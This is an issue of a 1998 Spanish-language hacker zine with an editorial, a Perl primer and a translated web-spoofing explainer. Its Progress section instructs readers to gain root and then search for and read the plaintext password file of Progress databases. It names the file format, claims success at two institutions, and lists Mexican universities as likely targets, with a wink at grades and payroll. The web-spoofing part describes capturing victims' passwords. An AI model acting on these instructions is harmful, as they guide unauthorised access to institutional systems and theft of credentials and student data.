RareGaZz nº14:(RARE0014.TXT):15/10/1998 << Back To RareGaZz nº 14
---------------------------------------------------- Año 2/Numero 14 │ Septiempre de 1998 ─────────────────────────────────────────────────────────────────────────────── │ ---------------------------------------------------- ooooooo oo ooooooo oooooo ooooo oo oooooo oooooo $$""$$" o$"$$ $$""$$" $$ o$$""o, o$"$$ """$$ """$$ $$o$$" $$ $$ $$o$$" $$$$$$ $$ $$ $$ $$ $$ $$ $$$$$ $$ $$ $$$$$ $$"""" "$o $$ $$ $$ $$" $$" $$" $$ $$$$$$$ $$" $$ $$ "$o $$ $$$$$$$ o$" o$" $$ "$$ $$ $$ $$ "$$ $$ooooo "$o$$ $$ $$ o$$oooo o$$oooo "" """ "" "" "" """ """"""" "" "" "" """"""" """"""" ---------------------------------------------------- │ ─────────────────────────────────────────────────────────────────────────────── "La verdad nos hara libres" ---------------------------------------------------- Editor: Cytorax y Azumlord Co-editores: Azumlord y GuyBrush RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax Grovvy, Guybrush, KillerBot Mr.X, Orion, PaTa, RareTrip, Senpai, ServerHacker, Vov_77 y Yo_soy. Agradecimientos: Jhocker, Mr.Nexus, Barbwired/Freedom Distribuidores Oficiales: raregazz.islatortuga.com raregazz.acapulco.uagro.mx E-mail Ofical: raregazz@iname.com Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team, MEMR, LIZA. Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord despues de una mala noche. Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro los archivos del ftp de la lista de los RareDudeZz y el(los) idiota(s) lamer(s) que avisaron a los de geocities sobre la pagina de SET. Comentarios (Oficiales): Mas vale tarde que nunca :-) ─[ E d i t o r i a l ]──────────────────────────────────────────────────────── Hola de nuevo lector de esta espectacular revista. He decidido hacer esta editorial, no como las convencionales, sino como una que nos ponga a pensar un poco, una que nos haga recapacitar, conste que no quiero hacer cambiar de forma de pensar a nadie, solo que den su punto de vista. Por ejemplo todos no atacamos contra todos sin saber la explicacion de lo que es el bien o de lo que es el mal, muchos acusan a los hackers de ser gente "mala" pero que es a lo que ellos definen como malo, solo juzgan sin saber estas importantes definiciones. Primero, ¿que es el bien?, segun Federico Nietzsche es todo lo que eleva en el hombre el sentimiento de la potencia, la voluntad de la potencia, la potencia en si. Ahora, ¿que es lo malo?, es todo cuyas raices residen en la debilidad. Como una pequeña conclusion ¡Que los debiles y los fracasados perezcan!. Bueno creo que con estas dos definiciones podemos empezar a defendernos, ya que nosotros no hacemos nada malo solo queremos conocer mas, mas y mas a lo nos lleva a una elevacion de nuestra potencia, que al contrario de hacer algo malo como la gente dice o divulga, seria el ser una escoria unos debiles y unos fracasados, que es lo que menos queremos ser y que talvez la gente que nos acusa de malos tienen miedo a lo que sabemos, como dice en la oracion anterior ¡Que los debiles y los fracasados perezcan!, es asi como presento esta revista, desde otro punto de vista, espero que les sirva de algo y piensen antes de actuar. Esto no fue un sermon o algo por el estilo, sigan adelante que la revista esta EXCELENTE. NoS vEmOS lUeGO, y LoS dEjO cON eSTA fRaSE: ¿El amor en la familia en donde se da? En el padre o en la Madre. ┌──[ C o n t e n i d o s ]───────────────────────────────┐ ┌─┤ │ │ │ +Editorial -----------------------> Cytorax │ │ │ +Progress ------------------------> Azumlord │ │ │ +Manual de Bolsillo de Perl ------> Cytorax │ │ │ +Web Spoofing --------------------> GuyBrush │ │ │ +Peligro en Windows --------------> Yo_Soy │ │ │ +Introduciendo tus exploits ------> Yo_Soy │ │ │ +Esteganografia ------------------> PaTa │ │ │ +Curso de Antivirus --------------> Jhocker │ │ │ +Back Orifice --------------------> Barbwired/FREEDOM │ │ │ +FuCKiNG TeLMeX ------------------> Juan Pablo │ │ │ +Reflexiones de Nadie ------------> Mr. Nexus │ │ │ +Bugs y Exploits -----------------> PaTa │ │ │ +Letz Hack -----------------------> Azumlord │ │ │ +Accediendo al IRC por telnet-----> Senpai │ │ │ +Cartas del Lector ---------------> GuyBrush │ │ │ +NotiLOONZ -----------------------> GuyBrush/Azumlord │ │ │ +Llaves PGP ----------------------> RareGaZz Staff │ │ │ +DESPEDIDA?? ---------------------> Cytorax/Azumlord │ │ └──────────────────────────────────────────────────────┬─┘ └────────────────────────────────────────────────────────┘ "El ser es, y el no ser no es" Mi maestra de filosofia tratando de explicar ese dilema. 01010101010101010101010101010101010101010101010101010101010101010101010 10 01 01 #!/bin/RareGaZzsh 10 10 # La informacion contenida en este zine tiene fines completamente 01 01 # de entretenimiento y educativos, los autores de la informacion 10 10 # aqui presentada no se hacen responsables de los posibles daños 01 01 # que se puedan ocasionar...... 10 10 01 01010101010101010101010101010101010101010101010101010101010101010101010 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Progress -=( Azumlord )=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ D i s c l a i m e r ]────────────────────────────────────────────────────── La informacion aqui presentada, tiene fines solamente educativos, cualquier uso indebido de la informacion aqui contenida es responsabilidad de usted! ( Demonios, eso lo dijeron en un comercial???), el autor no se hace responsable de los daños materiales o psicologicos que sean producto de un mal uso de lo aqui expuesto. ─[ L a H i s t o r i a ]────────────────────────────────────────────────────── Progress Software Corporation fue fundada en 1981 en Bedford, Massachusetts, E.U.A: y es una compañia lider en la oferta de bases de datos, herramientas de desarrollo y soluciones empresariales "A Prueba del Futuro", y para solucionar los problemas en los procesos de las empresas y proveer Ventajas competitivas reales. Progress Software se empezo a conocer en Mexico a partir de 1989 con la distribucion de sus productos a traves de los siguientes distribuidores: * 1989 - 1991 : Genetec, Dataflux * 1991 - 1993 : Tecnologia en Desarrollo de Sistemas (Actual Asociado en Aplicaciones Progress) En 1993 debido al gran crecimiento y aceptacion de los productos Progress en Mexico, la Corporacion decide establecer la representacion directa de la compañia, fundandose el 22 de febrero de 1993 la subsidiaria mexicana de Progress Software Corporation. ─[ Q u e e s ? ? ]─────────────────────────────────────────────────────────── Progress es un lenguaje de programacion de cuarta generacion el cual permite manejar grandes bases de bases de datos y dar soluciones a todos los sectores de la industria, como son el sector de Manufacturera, Finanzas, Distribucion, Salud, Gobierno, Comercio, Telecomunicaciones, Educacion, etc. y mercados verticales como Contabilidad y Recursos Humanos. Progress provee un ambiente para el desarrollo rapido de aplicaciones en bases de datos relacionales y un conjunto de herramientas de desarrollo graficas (GUI) y de modo caracter. Con Progress se desarrollan aplicaciones empresariales para cliente/servidor y modo host, que son indepedientes de la base de datos, el sistema operativo, y la interfaz de usuario. Progress incorpora la tecnologia de objetos mediante componentes que permiten fabricar y ensamblar aplicaciones rapidamente. Progress es facil de aprender, las herramientas graficas de desarrollo guian al programador en su esquema de desarrollo, el Progress 4GL es un lenguaje completo con el cual no se requiere de la utilizacion de un lenguaje de tercera generacion para programar tareas complejas. Adicionalmente, una aplicacion desarrollada en Progress es facil de poner en produccion, bajo consumo de recursos de maquina y gran portabilidad sobre multiples plataformas tales como Unix, Windows, AS/400, y Novell.Igualmente, una aplicacion desarrollada en Progress puede ser puesta en marcha sobre otras base de datos distintas de Progress tales como Oracle, Sybase, DB/2-400, SQL Server y ODBC-compliant. ─[ C o m o H a c k e a r l o ? ? ]───────────────────────────────────────────── Como ya vimos anteriormente, Progress es una herramienta que te permite administrar con facilidad y *confiabilidad* grandes bases de datos, asi que en la mayoria de los casos se restringira el acceso a estas bases de datos utilizando un password y estableciendo determinados permisos a cada usuario de estas bases de datos. Tb. como ya se establecio anteriormente Progress es una herramienta con la cual se generan apliaciones INDEPENDIENTES del Sistema Operativo, pero suponiendo que el Progress se este corriendo bajo un ambiente Unix, lo que tendrias que hacer es obtener root en ese sistema o por lo menos un usuario con permisos de administrador, despues de que ya hayas obtenido alguno de los dos, viene lo mas sencillo, encontrar el archivo de passwords, esto sera algo sencillo si tomamos en cuenta que puede tener cualquier nombre pero su terminacion tiene que ser *.d, de tal manera que puedes ejecutar este comando para encontrarlo. #find / -name *.d -print En este caso el archivo tenia un nombre muy obvio usuario.d y su contenido es el siguiente: "administrador" "Administrador del Sistema" "adm000.p" "per001" "1" "Eureka" |-----1-----| |---------2------------| |---3---| |--4--| |5| |--6--| 1.- Nombre de Usuario 2.- Informacion adicional sobre el usuario 3.- Rutina para verificar el passwd 4.- Perfil del usuario algo asi como el .profile 5.- Privilegios del usuario. 6.- Password Como se puede ver cada campo esta separado por comillas y un espacio en blanco, ademas el password aparece desencriptado };-) NOTA: Como ya comente anteriormente el Progress es todo un lenguaje de programacion, es decir, en algunos casos los administradores pueden cambiar la rutina que verifica el password, o agregar algun metodo de encriptacion del mismo. PERO al parecer todas las instituciones, empresas u organizaciones que adquieren el Progress reciben un curso de capacitacion, el cual es el mismo para TODOS, si, si ya se que se estaran preguntando y eso que????, pues si el curso es el mismo para todos quiere decir que estaran usando rutinas muy semejantes a las que expuse, quiero agregar que yo lo probe en dos instituciones diferentes y usaban el mismo metodo :-) ─[ Q u i e n l o u s a ? ? ]──────────────────────────────────────────────── Como ya se habran dado cuenta, Progress es una herramienta muy versatil, y es usado en todos los sectores de la industria, pero no estaria nada mal saber quien lo usa exactamente, jeje bueno pues he aqui una lista muy buena, de las Universidades que usan esta "oh!, gran herramienta" };-) Fue una verdadera pena solo encontrar las Universidades que utilizaban esta herramienta, me hubiese gustado haber encontrado tambien a las empresas e instituciones que utilizan el Progress. :-( ITAM http://www.itam.mx ITESM (10 campus) http://www.sistemas.itesm.mx UNIVERSIDAD DE LAS AMERICAS (UDLA) http://www1.udla.mx/index.html UNIVERSIDAD POPULA AUTONOMA DEL ESTADO DE PUEBLA (UPAEP) http://www.pue.upaep.mx UNIVERSIDAD LA SALLE http://www.ulsa.mx UNIVERSIDAD CHAPULTEPEC http://www.univchapultepec.edu.mx UNIVERSIDAD LATINOAMERICANA (ULA) http://www.ulanet.mx UNIVERSIDAD DEL VALLE DE MEXICO (7 CAMPUS) INSTITUTO TECNOLOGICO DE CELAYA UNIVERSIDAD VERACRUZANA INSTITUTO POLITECNICO NACIONAL (C.I.C) UNIVERSIDAD IBEROAMERICANA GOLFO CENTRO http://www.uiagc.pue.uia.mx UNIVERSIDAD AMERICANA DE ACAPULCO http://www.uaa.edu.mx CENTRO NACIONAL DE INVESTIGACION Y DESARROLLO TECNOLOGICO UNIVERSIDAD LATINA DE AMERICA UNIVERSIDAD ISEC INSTITUTO DE ESTUDIOS SUPERIORES DE TAMAULIPAS http://www.iest.mx UNIVERSIDAD KINO http://www.unikino.mx UNIVERSIDAD AUTONOMA DE NUEVO LEON http://www.dsi.uanl.mx UNIVERSIDAD DEL NORTE http://www.uninorte.edu.com UNIVERSIDAD REGIOMONATANA http://www.ur.mx Que!!!!!!!!??????????, que porque las Universidades adquirieron el Progress???, lo adquirieron para manejar cosillas sin importancia como son las calificaciones y colegiaturas de los alumnos, nominas de los maestros, y cosas por el estilo....... ;-) ─[ D e s p e d i d a ]─────────────────────────────────────────────────────────── Pues bien eso es todo, son las 2:43 a.m. y tengo un sueño de la chingada ah!!!, casi lo olvido quiero pedir disculpas por el uso repetitivo de las palabras tales como, "Como" y similares............ -//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\ -\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-// \ / Por: Cytorax \ MANUAL DE BOLSILLO DE PERL I / Cytorax@BigFoot.com \ / http://members.xoom.com/cytorax/ http://members.tripod.com/~cytorax/ INTRO Perl que significa "Practical Extraction and Report Language" es un lenguaje de programacion medianamente nuevo, el cual surgio de otras herramientas de UNIX como son : sed,grep,awk,c-shell. Principalmente sirve para labores de procesamiento de texto, lo cual lo hace en una forma facil y clara, no como es en C o Pascal; tambien sirve para la programacion de software de sistemas; y ahora ultimo se ha consolidado como "el" lenguaje para programar aplicaciones para WWW, por ejemplo un programa que ponga en pantalla las notas de un alumno dada su matricula, etc. Por todas estas potencialidades es que estudiaremos Perl. Nuetro primer programa sera el ya tipico, que imprime Hola, Mundo! : #!/usr/local/bin/perl print "Hola, Mundo!\n"; La primera linea lo que hace es llamar al compilador de Perl. La segunda linea imprime Hola, Mundo! y un cambio de linea(\n). Debemos decir que todas las lineas (salvo contadas excepciones) de un programa en Perl terminan con ';' . Veamos un programa ahora en el cual se interactua con el usuario : #!/usr/local/bin/perl print ("Cual es tu nombre?"); $nombre=<STDIN; chop($nombre); print "Hola, $nombre!\n"; En la segunda linea igual que antes se imprime un mensaje, pero ahora vemos que esta con '()', estos son opcionales. En la siguiente linea se introducen dos nuevos conceptos, primero el de variable ($name),- en el STAGE I veremos que las variables (escalares) empiezan con '$'-; <STDIN lo que indica es que se leera una linea desde la entrada estandard. En la cuarta linea la funcion chop() lo que hace es sacarle el ultimo caracter a $name, es decir le quita el Enter (cambio de linea). Y finalmente en la ultima linea lo saludamos, en esta vemos que $name toma el valor que se le ingreso. Veamos un programa en el cual se eligen opciones : #!/usr/local/bin/perl print ("Cual es tu nombre?"); $nombre=<STDIN; chop($nombre); # saca el enter a la linea leida if ( $name eq "Claudio") { print "Hola, Claudio! Como estas!\n"; } else { print "Hola, $nombre\n"; } En la tercera linea vemos el caracter '#' que significa comentario.En la quinta linea se introduce el if, el cual mediante el eq compara dos strings: $name y "Claudio"; hay que hacer notar que el cuerpo del if siempre va entra llaves(aunque sea una linea), al igual que el else, el cual significa que se imprime "Hola, $name\n" si no se cumplio la condicion del if. Un ultimo programa, en el cual se introducen los ciclos: #!/usr/local/bin/perl print ("Cual es tu nombre?"); $nombre=<STDIN; chop($nombre); $palabrasec="llama"; if ( $name eq "Claudio") { print "Hola, Claudio! Como estas!\n"; } else { print "Hola, $nombre\n"; print "Cual es la palabra secreta?"; $palabra=<STDIN; chop($opcion); while ( $palabra ne $palabrasec ) { print "Error, intentalo de nuevo, cual es la palabra secreta?"; $palabra=; chop($palabra); } } En la 16a linea usamos el while, el cual al igual que en otros lenguajes significa que las lineas entre las llaves se repetiran mientras sea verdadera la condicion, la cual en este caso pregunta si $palabra no es igual a $palabrasec. STAGE I Datos escalares En Perl existen dos tipos de datos, numeros y strings, pero entre los numeros estan los enteros y los reales. Ej: 4,7.5,"hola" Float : Ej: 1.25,4.25e45,-6.5e24,-1.2E-23 Integer : Ej: 12,15,-2004,3485 0377 # 377 octal <= 255 decimal -0xff # ff negativo en hexadecimal <= -255 decimal Strings : Ej: "hola",'Como estas' Para senalar los strings hay dos formas de hacerlo: ╖ Single quoted : Ej:'hola' # h,o,l,a 'don\'t' # d,o,n,',t '' # string nulo 'donde\\vas' # d,o,n,d,e,\,v,a,s 'hola\n' # h,o,l,a,\,n 'hola tu' # h,o,l,a,[enter],t,u ( 11 caracteres ) ╖ Double quoted Ej:"hola mundo\n" # hola mundo[enter] "cola\tsprite" # cola[tab]sprite Como vimos en estos ejemplos en los double quoted strings, se reconocen cosas como \n,\t,etc. mientras que con single quoted no, pero tiene la ventaja de poder escribirse literalmente lo que se pone entre ellos. Operadores Numeros : Ej:2+3 # 5 5.1-2.4 # 2.7 3*12 # 36 2**3 # 8 Strings : a) Concatenacion(.): Ej:"Hola"."mundo" # "Holamundo" "juan"." "."pedro" # "juan pedro" b) Operador de repeticion de strings(x) : Ej:"juan"x3 # "juanjuanjuan" "pedro"x(4+1) # "pedropedropedropedropedro" c) Operadores de comparacion : Numeros Strings == eq != ne < lt gt <= le = ge Conversion entre n·meros y strings "123.45juan" # si es operado como numero toma el valor 123.45 Ej: $a="3b"; $b=$a+5; # $b=8 Conversion al reves : Ej: $a=5; "x".$a # "x5" Variables escalares Una variable escalar es un nombre que mantiene un valor, en Perl las variables deben empezar con '$' . Ej:$a,$nombre Operadores Ej:$a=17; $b=$a+3; $b=$b*2; $a=4+($a=3); # $b=7,$a=3 $d=$c=5; Interpolacion de variables escalares en strings Si una variable es puesta en un string double quoted (") se interpola el valor de la variable. Ej:$a="juan"; $b="hola $a"; # $b="hola juan" Y si una variable se pone entre single quoted (') no se interpola el valor de la variable. Ej: $x="hola"; $y='$x amigo'; # asigna '$x amigo a $y En los strings existen tambien algunos modificadores: \U,\u,\L Ej: $mayjuan="\Ujuan"; # $mayjuan="JUAN" $juan="juan"; $mayjuan="\U$juan"; # $mayjuan="JUAN" $capjuan="\u$juan"; # $capjuan=Juan $pedro="\LPEDRO"; # $pedro="pedro" $cappedro="\u\LPEDRO"; #cappedro="Pedro" $maypedro="PEDRO"; $cappedro="\u\L$maypedro"; # $cappedro="Pedro" <STDIN como valor escalar $a=<STDIN lee una linea de la entrada estandard y la guarda en $a Salida con print print("Hola Mundo\n"); <= print "Hola Mundo\n"; El valor undef Que pasa si usamos una variable antes de darle un valor ? , nada fatal, se asigna como cero si es numero 0 "" si es como string. Ej: $a=3; $b=$a+$c; # $b=3 $x="hola"; $y=$x.$z; # $y="hola" STAGE II Arreglos Un arreglo es una lista ordenada de datos escalares. Los arreglos pueden tener cualquier numero de elementos. Representacion literal Un arreglo es una lista de valores separados por coma y dentro de parentesis. Los valores de los elementos pueden ser de distinto valor. Ej: (1,2,3) ("juan",4.5) Sus valores no necesariamente tienen que ser constantes, puede tener variables. Ej: ($a,17) ($b+$c,$d+$e) El arreglo vacio es representado por () . Variables Asi como las variables escalares se representan con un '$' al comienzo, las variables de tipo arreglo empiezan con '@'. Ej: @a , @hola Operadores Asignamiento: Mediante el operador '=' le podemos dar a una variable arreglo un valor. Ej:@a=(1,2,3); @b=("yo","tu",2); @c=@a; # copia el arreglo @a en @c @d=($x,$y); El largo de un arreglo ( ej : @a ) queda guardado en $#a. Acceso a los elementos Para enumerar los elementos de un arreglo se empieza desde el 0. El primer elemento del arreglo @a es $a[0], vemos que para accesar un elemento especifico del arreglo ya no se ocupa '@'. Ej: @a=(7,8,9); $b=$a[0]; # asigna 7 a $b $a[1]=5; # ahora @a es (7,5,9) $a[2]++; # suma uno al tercer valor de @a siendo ahora (7,5,10) $c=$a[0]+$a[1]; Hasta ahora solo hemos visto que los indices de los arreglos son constantes, pero tambien pueden ser variables. Ej:@juan=(7,8,9); $a=2; $b=$juan[$a]; $c=$juan[$a-1]; # $c=8 $d=$a[$#a]; # $d=9 Si uno accesa un elemento del arreglo mas alla del fin del arreglo el valor undef es retornado. Ej: @a=(1,2,3); $b=$a[7]; # $b es 0 o "" , dependiendo del contexto Asignar un valor a un elemento ams alla del fin del arreglo, lo que hace es agrandar el arreglo poniendo undef a los valores intermedios. Ej: @a=(1,2,3); $a[3]="hola"; # @a es ahora (1,2,3,"hola") $a[6]="chao"; # @a es ahora (1,2,3,"hola",undef,undef,"chao") Push y Pop Una comun utilizacion de los arreglos es como stacks, donde los nuevos valores son agregados y borrados por el lado derecho del arreglo. Push() es utilizado para agregar elementos y pop() para sacar. Ej: @lista=(1,2,3); push(@lista,5); # @lista=(1,2,3,5) $a=pop(@lista); # $a=5, @a=(1,2,3) Shift y Unshift() Al igual que Pop y Push estos sacan y meten elementos de un arreglo, pero lo hacen por el lado izquierdo. Ej: @a=(1,2,3); unshift(@a,0); # @a=(0,1,2,3); $x=shift(@a); # $x=0 , @a=(1,2,3) unshift(@a,5,6,7) # @a=(5,6,7,1,2,3) El Operador reverse reverse() invierte el orden de los elementos de un arreglo, retornando la lista invertida. Ej: @a=(1,2,3); @b=reverse(@a); # @b=(3,2,1) @c=reverse(1,2,3); # lo mismo Notemos que la lista que se le pasa como parametro permanece inalterable. Si nosotros queremos dejar la lista invertida ahi mismo debemos hacer : @a=reverse(@a). Sort Sort toma una lista y la ordena ascendentemente ( segun codigo ASCII ) y retorna la lista ordenada. Ej: @a=sort("grande","pequeño","chico"); # @a=("chico","pequeño","grande"); @b=(1,2,4,8,16,32,64); @c=sort(@b); # @c=(1,2,16,32,4,64,8) Como vemos en este ultimo ejemplo sort()ordena por strings, no numericamente. Chop chop() trabaja igual que en variables escalares, le saca el ultimo caracter a cada elemento del arreglo. Ej: @a=("hola","mundo\n","felices dias"); chop(@a); # @a=("hol","mundo","felices dia") <Stdin como arreglo <STDINretorna la siguiente linea de input de la entrada estandard y lo hace en un con texto escalares decir : $x=<STDIN; # $x guarda un string , una linea leida de la entrada estandard Tambien se puede usar en un contexto de arreglo : @a=<STDIN; # lee todas las lineas de la entrada estandard y guarda cada linea en un elemento del arreglo @a. STAGE III Estructuras de control Al igual que en la mayoria de los lenguajes de programacion , en Perl existen estructuras como if, for, while. If, Elseif, Else La estructura de un if es la siguiente : if ( .... ) { ......; ......; } elsif ( .... ) { ......; ......; } elsif ( .... ) { ......; ......; } else ( .... ) { ......; ......; } Notemos que los elsif y el else van solo si el usuario desea varias preguntas, se podria usar por ejemplo : if ( $a < 18 ) { print "Tu eres menor de edad\n"; } else { print "Eres un adulto\n"; } o : if ( $a == 0 ) { $ind++; print "Incorrecto\n"; } Digamos tambien que aunque sea una instruccion por if debe ir entre llaves. While y Until La forma del while es : while ( condicion ) { ....; ....; } Lo que esta entre llaves se ejecuta mientras sea veradera la condicion. Ej: print "Cuantos años tienes?"; $a=<STDIN; chop($a); while ( $a 0 ) { print "El año pasado tenias $a años\n"; $a--; } La forma del until es : until ( condicion ) { ...; ...; } A diferencia del while el until se ejecuta al menos una vez , y se sigue mientras la condicion sea falso , es decir es similar al Repeat/Until de Pascal. For La forma general del for es : for ( exp_inicial; exp_testeo; exp_increm){ ...; ...; } Ej: for ( $x=0;$x<10;$x++) { print "Llevas $x puntos\n"; } Foreach El foreach de Perl es muy similar al de C-shell , recibe una lista de valores y asigna cada uno de los valores de la lista a una variable de lectura . La estructura del foreach es : foreach $a ( @alguna_lista ) { ...; ...; ...; } Ej:@a=(3,5,7,9); foreach $x (@a) { $y=$x*3; print "$y\n"; } Imprime 9,15,21,27 . STAGE IV Lectura de Archivos y Entrada Estandar Entrada Estandard Como ya dijimos para leer una linea desde la entrada estandard se debe asignar una variable escalar a <STDIN Ej:$a=<STDIN; # guarda en $a la linea leida chop($a); # le sacamos el enter que tienen todas las lineas por su ingreso Como procesar toda la entrada estandard ?: while ( $a=<STDIN ) { manejo de la linea leida ..... ; } El while termina cuando ya no encuentra una linea ingresada desde la entrada estandard. Otra forma de hacer esto ultimo ( procesar toda la entrada est. ) es asignar <STDIN a una variable de tipo arreglo Ej : @b=<STDIN ; # en $b[0] guarda la 1a linea, en $b[1] la 2a .... Lectura de Parametros Pasados a un Programa Dentro de un programa en Perl los argumentos que se le pasan quedan guardados en el arreglo @ARGV . Ej: %vi prog1.pl #!/usr/local/bin/perl print "Tu ingresaste las palabras:\n"; for($x=0;$x DESPEDIDA Bueno espero que les halla gustado este breve cursillo en la proxima revista, seguiremos con este manual pero introduciendonos mas en el tema, osea sere mas profundo y un poco mas complicadillo, pero no te preocupes hay viene lo bueno, claro que me falto informacion, pero por falta de tiempo, salud entre otras cosas no pude profundizar esta vez pero mantente al tanto. MI LLAVE PGP Localizada en su debido apartado =) . _m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m -w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w- &&&&&&&&&&&&&&&&&&&&&&& && Web Spoofing && &&&&&&&&&&&&&&&&&&&&&&& Introduccion ------------ Este documento describe un ataque de seguridad en Internet que puede poner en peligro la privacidad de los usuarios de la World Wide Web y la integridad de sus datos. El ataque puede ser llevado a cabo en los sistemas de hoy en dia, poniendo en peligro a los usuarios de los navegadores mas comunes, incluyendo el Netscape Navigator y el Microsoft Internet Explorer. El Web Spoofing permite a un atacante crear una "copia sombra/shadow copy" de toda la World Wide Web. Los accesos a la Web shadow son encauzados por la maquina del atacante, permitiendo a este monitorizar todas y cada una de las actividades de la victima incluyendo las entradas de passwords o numeros de cuenta que haga este. El atacante puede tambien hacer que datos falsos o engañosos sean enviados a servidores Web en nombre de la victima, o a la victima en nombre de cualquier servidor Web. Resumiendo, el atacante observa y controla todo lo que la victima hace en el Web. Ataques Spoofing ---------------- En un ataque spoofing, el atacante crea un contexto engañoso para asi engañar a la victima de forma que haga una decision relacionada con la seguridad inapropiada. Un ataque spoofing es como una estafa: el atacante monta un mundo falso pero convincente alrededor de la victima. La victima hace algo que podria ser apropiado si el falso mundo fuese real. Desafortunadamente, las actividades que parecen razonables en el falso mundo podrian tener efectos desastrosos en el mundo real. Los ataques spoofing son posibles tanto en el mundo fisico como en el electronico. Por ejemplo, ha habido varios incidentes en los que los criminales ponen maquinas expendedoras falsas, normalmente en areas publicas de grandes almacenes [1]. Las maquinas aceptan las tarjetas ATM y piden a la persona que meta su codigo PIN. Una vez que la maquina tiene el codigo PIN de la victima, puede o bien tragarse la tarjeta o "malfuncionar" y devolver la tarjeta. En cualquiera de los casos, los criminales tenian suficiente informacion para copiar la tarjeta de la victima y usar el duplicado. En estos ataques, la gente era engañada por el contexto que veian: la localizacion de las maquinas, su tamaño y peso, la forma en que estaban decoradas, y la apariencia de sus pantallas electronicas. La gente que usa sistemas informaticos a menudo toma decisiones relacionadas con la seguridad basadas en indicaciones contextuales que ven. Por ejemplo, puedes decidir teclear tu numero de cuenta banacario por que crees que estas visitando la Web page de tu banco. Esta creencia puede surgir por que la pagina tiene un aspecto familiar, por que el URL del banco aparece en la linea de localizacion del navegador, o por otras razones. Para apreciar el rango y severidad de posibles ataques spoofing, debemos profundizar en dos partes de la definicion de spoofing: decisiones relacionadas con la seguridad y contexto. Decisiones relacionadas con la seguridad ---------------------------------------- Por "decisiones relacionadas con la seguridad", queremos decir cualquier decision que toma una persona que pueda llevar a resultados no deseados como una violacion de la privacidad o manejo no autorizado de datos. El decidir divulgar informacion sensible, como por ejemplo tecleando un password o un numero de cuenta, es un ejemplo de una decision relacionada con la seguridad. Elegir el aceptar bajar un documento es una decision relacionada con la seguridad, ya que en muchos casos un documento bajado es capaz de contener elementos maliciosos que dañan a la persona que recibe el documento [2]. Incluso la decision de aceptar la exactitud de informacion desplegada por tu ordenador puede tener relacion con la seguridad. Por ejemplo, si decides comprar una accion basada en informacion que recibes de un teletipo de acciones online, confias en que la informacion que proporciona el teletipo sea correcta. Si alguien pudiera presentarte precios de acciones incorrectos, podrian hacerte embarcar en una transaccion que de otro modo no hubieras hecho, y esto te podria costar dinero. Contexto -------- Un navegador presenta muchos tipos de contexto de los que el usuario podria fiarse para tomar decisiones. El texto y los graficos de una pagina Web podrian dar una impresion sobre la procedencia de la pagina; por ejemplo, la presencia de un logo corporativo implica que la pagina se creo en una cierta corporacion. La apariencia de un objeto podria sugerir una cierta impresion; por ejemplo, texto de color verde neon sobre un fondo morado probablemente venga de la revista Wired. Podrias pensar que estas tratando con una ventana contextual cuando lo que realmente estas viendo es simplemente un rectangulo con un borde y colores diferentes que las zonas de alrededor de la panatalla. Objetos graficos particulares como las file-open dialog boxes son immediatamente reconocidas como que tienen que tener un proposito. Los usuarios de Web experimentados reaccionan a dichas indicaciones de la misma forma que los conductores experimentados reaccionan a las señales de stop sin necesidad de leerlas. Los nombres de los objetos pueden sugerir contextos. La gente a menudo deduce lo que hay en un archivo por su nombre. Es manual.doc el texto de un manual de usuario? (Podria ser otra clase de documento, o podria no ser ni siquiera un documento.) Las URLs son otro ejemplo. Es MICR0S0FT.COM la direccion de una gran empresa de software? (Por un momento esa direccion apuntaba completamente a otro. Por cierto, los simbolos redondos de MICR0S0FT aqui son el numero cero, no la letra O.) Era dole96.org la campaña presidencial de 1996 de Bob Dole? (No lo era, apuntaba a un site de parodia). La gente a menudo toma el contexto segun la fecha de los hechos. Si ocurren dos cosas al mismo tiempo, naturalmente piensas que estan relacionadas. Si haces click hacia la pagina de tu banco y aparece un cuadro de dialogo solicitando un nombre de usuario/password, naturalmente asumiras que debes teclear el nombre y password que usas para el banco. Si haces click en un link y comienza a bajarse immediatamente un documento, asumes que el documento venia del site cuyo link clickeaste. Cualquier suposicion podria ser incorrecta. Si solo ves una ventana del navegador cuando ocurre un evento, podrias no darte cuenta de que el evento fue creado por otra ventana escondida detras de la que es visible. Los diseñadores de entornos de usuario modernos emplean su tiempo intentando concebir indicaciones contextuales que hagan que la gente actue apropiadamente, incluso si no advierten explicitamente las indicaciones. Mientras esto es siempre beneficioso, puede hacerse peligroso cuando la gente esta acostumbrada a fiarse del contexto que no siempre es correcto. TCP y DNS Spoofing ------------------ Otra clase de ataque spoofing, que no discutiremos aqui, engaña al software del usuario en una accion inapropiada presentandole informacion enagañosa [3]. Ejemplos de dichos ataques incluyen el TCP spoofing [4], en el que los paquetes de Internet son enviados con direcciones de vuelta falseadas, y el DNS spoofing [5], en el que el atacante falsea informacion acerca de que nombres de maquina corresponden a que direcciones de red. Estos otros ataques spoofing son bien conocidos, asi que no los discutiremos mas en detalle. Web Spoofing ------------ El Web spoofing es un tipo de estafa electronica en la que el atacante crea una convincente pero falsa copia de toda la World Wide Web. La Web falsa es como la real: tiene todas las mismas paginas y links. Sin embargo, el atacante controla la falsa Web, de manera que todo el trafico de red entre el navegador de la victima y la Web pasa por el atacante. Consecuencias ------------- Ya que el atacante puede observar o modificar cualquier dato que vaya de la victima a los servidores Web, como tambien controlar todo el trafico de vuelta de los servidores Web a la victima, el atacante tiene muchas posibilidades. Estas incluyen la vigilancia y el amaño de datos. Vigilancia: El atacante puede observar pasivamente el trafico, anotando que paginas visita la victima y los contenidos de las mismas. Cuando la victima rellena un formulario, los datos introducidos son enviados a un servidor Web, de manera que el atacante puede anotar eso tambien, junto con la respuesta enviada por el servidor. Ya que la mayoria del comercio on-line se realiza por medio de formularios, esto 